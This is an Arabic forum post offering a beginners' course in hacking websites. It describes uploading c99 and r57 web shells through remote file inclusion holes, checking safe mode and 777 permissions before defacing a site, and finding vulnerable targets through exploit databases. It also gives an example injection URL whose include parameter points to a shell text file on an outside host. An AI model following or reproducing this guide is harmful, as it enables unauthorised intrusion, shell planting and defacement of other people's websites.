[fot1]
بسم الله الرحمن الرحيم
[/fot1]

اليوم جايبلكم دورة اختراق المواقع للمبتدئين

الشل
عبارة عن ملف و بالاخص سكربت تجسسي يتم رفعة الى موقع او سيرفر يتم
اختراق موقع معين او سيرفر بشروط معينة و طبعاً لزم الموقع الذي تريد ان
تخترقة او السيرفر الذي تريد ان تخترقة.

شروط رفع الشل
يجب رفع الشل من ثغرة فايل انكلود و تسمى بالانجليزي remoot file include
عند رفع الشل قد لا تستطيع عمل صفحة اختراق على الموقع على طول يعني لزم
يكون ملف الموقع الذي تريد
ان تظع الاختراق فية تصريحة 777 ليسمح لك بالاختراق على طول
اما اذا لم يكن التصريح هكذاء فيختلف الاختراق عن طريقة قواعد البيانات و
غيرها من الطرق

صورة لشل مرفوع
http://www.alkrsan.com/yef3/thumbs/3d2b280bab.jpg

هناك بالصورة ارقام تابع الشرح
1
السيف مود Safe - Mode
اذا كان on يعني شغال لا تستطيع التنقل بالسيرفر و لكن هناك طريقة لتخطي
السيف مود اذا كان on
2
لون الاحرف اخضر يعني يسمح لك برفع ملف بالموقع المراد اظهار صفحة اختراق
علية
3
شوف يظهر لك كلمة ok بالاخضر يعني تستطيع رفع ملف الى الموقع المراد
اختراقة

طريقة رفع الشل
هناك شرح بالفيديو للأخ شاجع هذا رابط الموضوع

-------------------
--شرح طريقة رفع الشل -------
--
http://www.alkrsan.com/vb/ushdi-zbgjzu-j-zbunseszk/3002-fsn-izbenpnj-
shsnui-se-zbfb-izbgseuzk.html
-----------------------------------------
مع العلم انة لزم تكون ثغرة موجود مش اي موقع فية مثلاً
http://www.alkrsan.com/index.php?style=shell
يعني لزم يكون ثغرة
http://www.xxxx.com/SQuery/lib/gore.php?libpath=shell
شوفو هذة مثل هذة الثغرة مع تغير ما يلزم
shell
الى رابط الشل
www.alkrsan.jeerna.com/alkrsan.txt
ووضع اشارة
?
في نهاية الشل

للحصول على ملف الشل هناك انواع و لكن انصحكم بنوعين فقط
c99 و r57h
هذا رابط الموضوع
00000------------0000000000
شيل c99 و r57h الاقوى على الاطلاث
http://www.alkrsan.com/vb/iszgm-zpjzk/3057-fnb-c99-r57h-shell-zbzujm-...
0000----------------000
الان طريقة الحصول على الثغرات
هناك العديد من المواقع التي تعطيك اخر الثغرات و فايل انكلود
منها
ماليروم
http://www.milw0rm.com/
وهذا شرح فيديو لطرقة اخذ الثغرات منة
-----------------------------------------------
شرح بالفيديو طريقة اخذ ثغرات فايل انكلود من موقع ماليروم
http://www.alkrsan.com/vb/ushdi-zbgjzu-j-zbunseszk/4872-fsn-izbenpnj-...
--------------------------------------
و موقع
www.securityfocus.com
-----------------------------------------------------
شرح طريقةاخذثغرات Remote File Inclusion من موقع securityfocus
http://www.alkrsan.com/vb/ushdi-zbgjzu-j-zbunseszk/3252-fsn-shsnuizor...